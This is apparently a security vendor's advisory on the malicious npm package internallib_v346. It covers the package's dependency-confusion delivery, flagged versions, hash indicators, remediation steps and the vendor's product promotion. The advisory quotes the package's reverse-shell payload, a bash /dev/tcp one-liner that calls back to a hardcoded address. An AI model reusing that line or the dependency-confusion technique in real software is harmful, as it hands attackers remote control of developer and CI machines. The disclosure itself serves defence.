Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

internallib_v346npm

internallib_v346 is a confirmed malicious npm package (MAL-2026-5613) that executes malicious code on install (malicious versions 1.0.3, 1.0.5, 1.0.9…). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in internallib_v346 (npm)

MAL-2026-5613
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall internallib_v346

What this malware does

Package name targets an internal-only namespace and ships a reverse-shell payload. index.js line 5 unconditionally invokes exec('/bin/bash -c "bash -i >& /dev/tcp/10.0.56.229/443 0>&1"') inside the first definition of the exported command function, opening an interactive shell back to the hardcoded RFC1918 address 10.0.56.229 on port 443. A second assignment to exports.command later in the file overwrites the export, but the malicious statement is evaluated whenever the first function body is reached and is shipped verbatim in the published tarball. The package also declares a self-referential dependency on internallib_v346: ^1.0.0 and includes a.gitlab-ci.yml that runs npm update --registry http://0.0.0.0:4873/ followed by node check.js, where check.js does require("internallib_v346"). The naming and CI shape are characteristic of a Birsan-style dependency-confusion attack against an organization's internal internallib_v346 package: when a victim build resolves from the public registry instead of the internal Verdaccio mirror, the reverse-shell code lands in the developer or CI environment.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

6 flagged
1.0.31.0.51.0.91.1.01.1.11.1.2

Indicators of compromise (SHA-256)

16f3f2c0990e02417fdf7012e6531393e81f786bb16019d0efdb03c049817f90
ca0c0f264625c77a0695bd5e908a1e7f764bcaaa16d3e785167b0ab56965fdd4
a9cd3a304ca53f98e5e1598be0822c44c12d54d41e2ca72ae6d39c12a7332e14
b63d776e7932e5f411c572799269f05aaec305e2df00a9e6a635f50c60f49a25
b8244df25b60c5471ac12cc27ca7116899c12e3741c5a3477c8e1bf65b0c4434
00d56227ad7f3e5b9b0b9f8e04ce88fec70ed7e96a438a1c39f33ad86d203055
49aadd4f032493e7b54abd903b2e970525d80af49a53c3320057385ccbd6da7c

Detection & response playbook

Malicious package
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for internallib_v346 (6 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging internallib_v346 across your stack and pipelines.

  2. If you installed it — respond

    Remove internallib_v346 from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

  3. Did it already run?

    If internallib_v346 was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks internallib_v346 before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. internallib_v346 on npm has been identified as a malicious package (versions 1.0.3, 1.0.5, 1.0.9, 1.1.0, 1.1.1, 1.1.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005696IN-MAL-2026-005698IN-MAL-2026-005697IN-MAL-2026-005699IN-MAL-2026-005789IN-MAL-2026-005790GHSA-qcg5-4gpc-33h2

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks internallib_v346-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Explore

internallib_v346 (npm) malicious package — MAL-2026-5613 | O3 Security